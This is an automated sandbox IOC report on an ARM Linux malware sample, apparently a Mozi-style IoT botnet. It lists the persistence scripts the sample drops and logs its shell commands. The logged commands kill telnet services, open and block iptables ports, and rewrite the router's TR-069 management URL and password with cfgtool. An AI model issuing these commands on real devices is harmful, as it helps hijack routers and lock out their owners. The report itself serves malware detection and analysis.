IOC Report

Files

File Path
Type
Category
Malicious
KnAY2OIPI3
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
initial sample
malicious
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/bootmisc.sh
ASCII text
dropped
malicious
/etc/init.d/checkfs.sh
ASCII text
dropped
malicious
/etc/init.d/checkroot-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/checkroot.sh
ASCII text
dropped
malicious
/etc/init.d/hostname.sh
ASCII text
dropped
malicious
/etc/init.d/hwclock.sh
ASCII text
dropped
malicious
/etc/init.d/mountall-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/mountall.sh
ASCII text
dropped
malicious
/etc/init.d/mountdevsubfs.sh
ASCII text
dropped
malicious
/etc/init.d/mountkernfs.sh
ASCII text
dropped
malicious
/etc/init.d/mountnfs-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/mountnfs.sh
ASCII text
dropped
malicious
/etc/init.d/umountnfs.sh
ASCII text
dropped
malicious
/etc/profile.d/Z97-byobu.sh
ASCII text
dropped
malicious
/etc/profile.d/apps-bin-path.sh
ASCII text
dropped
malicious
/etc/profile.d/bash_completion.sh
ASCII text
dropped
malicious
/etc/profile.d/cedilla-portuguese.sh
ASCII text
dropped
malicious
/etc/profile.d/vte-2.91.sh
ASCII text
dropped
malicious
/etc/rc.local
ASCII text
dropped
malicious
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
malicious
/usr/bin/gettext.sh
ASCII text
dropped
malicious
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
dropped
malicious
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
dropped
malicious
/boot/grub/i386-pc/modinfo.sh
ASCII text
dropped
clean
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
dropped
clean
/etc/acpi/asus-wireless.sh
ASCII text
dropped
clean
/etc/acpi/ibm-wireless.sh
ASCII text
dropped
clean
/etc/acpi/powerbtn.sh
ASCII text
dropped
clean
/etc/acpi/tosh-wireless.sh
ASCII text
dropped
clean
/etc/acpi/undock.sh
ASCII text
dropped
clean
/etc/bash_completion.d/libreoffice.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/action_wpa.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/functions.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/ifupdown.sh
ASCII text
dropped
clean
/tmp/.config
ASCII text
dropped
clean
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
dropped
clean
/usr/share/alsa/utils.sh
ASCII text
dropped
clean
/usr/share/brltty/initramfs/brltty.sh
ASCII text
dropped
clean
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
dropped
clean
/usr/share/cups/braille/index.sh
ASCII text
dropped
clean
/usr/share/cups/braille/indexv3.sh
ASCII text
dropped
clean
/usr/share/cups/braille/indexv4.sh
ASCII text
dropped
clean
/usr/share/debconf/confmodule.sh
ASCII text
dropped
clean
/usr/share/doc/acpid/examples/ac.sh
ASCII text
dropped
clean
/usr/share/doc/acpid/examples/default.sh
ASCII text
dropped
clean
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
dropped
clean
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
dropped
clean
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
dropped
clean
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
dropped
clean
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
dropped
clean
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
dropped
clean
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
dropped
clean
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
dropped
clean
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
dropped
clean
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
dropped
clean
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
dropped
clean
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
dropped
clean
/usr/share/hplip/hplip_clean.sh
ASCII text
dropped
clean
/usr/share/keyutils/request-key-debug.sh
ASCII text
dropped
clean
/usr/share/lightdm/guest-session/setup.sh
ASCII text
dropped
clean
/usr/share/os-prober/common.sh
ASCII text
dropped
clean
/usr/share/vim/vim74/macros/less.sh
ASCII text
dropped
clean
/usr/share/xscreensaver/xscreensaver-wrapper.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/autoload.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/status.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/udev-install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/features/list-arch.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/s390/config3270.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/kernel/vdso/gen_vdso_offsets.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/blackfin/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/ia64/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/m32r/boot/compressed/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/m68k/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/mn10300/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/nios2/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/parisc/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/prom_init_check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/systbl_chk.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/relocs_check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/s390/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/sh/boot/compressed/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/sparc/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/entry/vdso/checkundef.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/kernel/cpu/mkcapflags.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/tools/calc_run_size.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/um/vdso/checkundef.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/parameters.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_bench_xmit_mode_netif_receive.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample01_simple.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample02_multiqueue.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample03_burst_single_flow.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/check_extable.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/checksyscalls.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/decode_stacktrace.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/depmod.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/dtc/update-dtc-source.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-goto.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-version.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_32-has-stack-protector.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_64-has-stack-protector.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gen_initramfs_list.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/headers.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/headers_install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/lxdialog/check-lxdialog.sh
C source, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/merge_config.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/ld-version.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/link-vmlinux.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/mkuboot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/selinux/install_policy.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/tags.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/xen-hypercalls.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/xz_wrap.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/spl/autogen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/spl/scripts/check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/build/tests/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/bondvf.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dhcp_info.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dns_info.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_set_ifconfig.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/nfsd/inject_fault.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/arch/x86/tests/gen-insn-x86-dat.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-archive.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-completion.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-with-kcore.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/util/generate-cmdlist.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_plot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_script.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/utils/version-gen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/fault-injection/failcmd.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/cpu-hotplug/cpu-on-off-test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/efivarfs/efivarfs.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_filesystem.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_userhelper.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/functional/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/gen_kselftest_tar.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/kselftest_install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memfd/run_fuse_test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memory-hotplug/mem-on-off-test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/net/test_bpf.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/config2frag.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configNR_CPUS.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configcheck.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configinit.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/cpus2use.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-build.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-lock.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-rcu.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-test-1-run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm.sh
awk or perl script, ASCII text, with very long lines
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-build.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-console.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-torture.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/lock/ver_functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/rcu/ver_functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/static_keys/test_static_keys.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/user/test_user_copy.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/x86/check_cc.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram01.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram02.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram_lib.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/time/udelay_test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/hcd-tests.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/autogen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/cleanup.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/vm/slabinfo-gnuplot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/zfs/autogen.sh
ASCII text
dropped
clean
/var/crash/_usr_share_apport_apport-checkreports.1000.crash
ASCII text
dropped
clean
/var/crash/_usr_share_apport_apport-gtk.1000.crash
ASCII text
dropped
clean

Processes

Path
Cmdline
Malicious
/tmp/KnAY2OIPI3
/usr/bin/qemu-arm /tmp/KnAY2OIPI3
clean
/tmp/KnAY2OIPI3
n/a
clean
/tmp/KnAY2OIPI3
n/a
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
clean
/bin/sh
n/a
clean
/usr/bin/killall
killall -9 telnetd utelnetd scfgmgr
clean
/tmp/KnAY2OIPI3
n/a
clean
/tmp/KnAY2OIPI3
n/a
clean
/tmp/KnAY2OIPI3
n/a
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT
clean
/sbin/iptables
n/a
clean
/sbin/modprobe
/sbin/modprobe ip_tables
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 38798 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 38798 -j ACCEPT
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT
clean
/tmp/KnAY2OIPI3
n/a
clean
/tmp/KnAY2OIPI3
n/a
clean
/tmp/KnAY2OIPI3
n/a
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 58000 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 58000 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 58000 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 35000 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 50023 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 7547 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 35000 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 50023 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 50023 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 35000 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 7547 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 7547 -j DROP
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --dport 18022 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p udp --dport 18022 -j ACCEPT
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT
clean
/tmp/KnAY2OIPI3
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
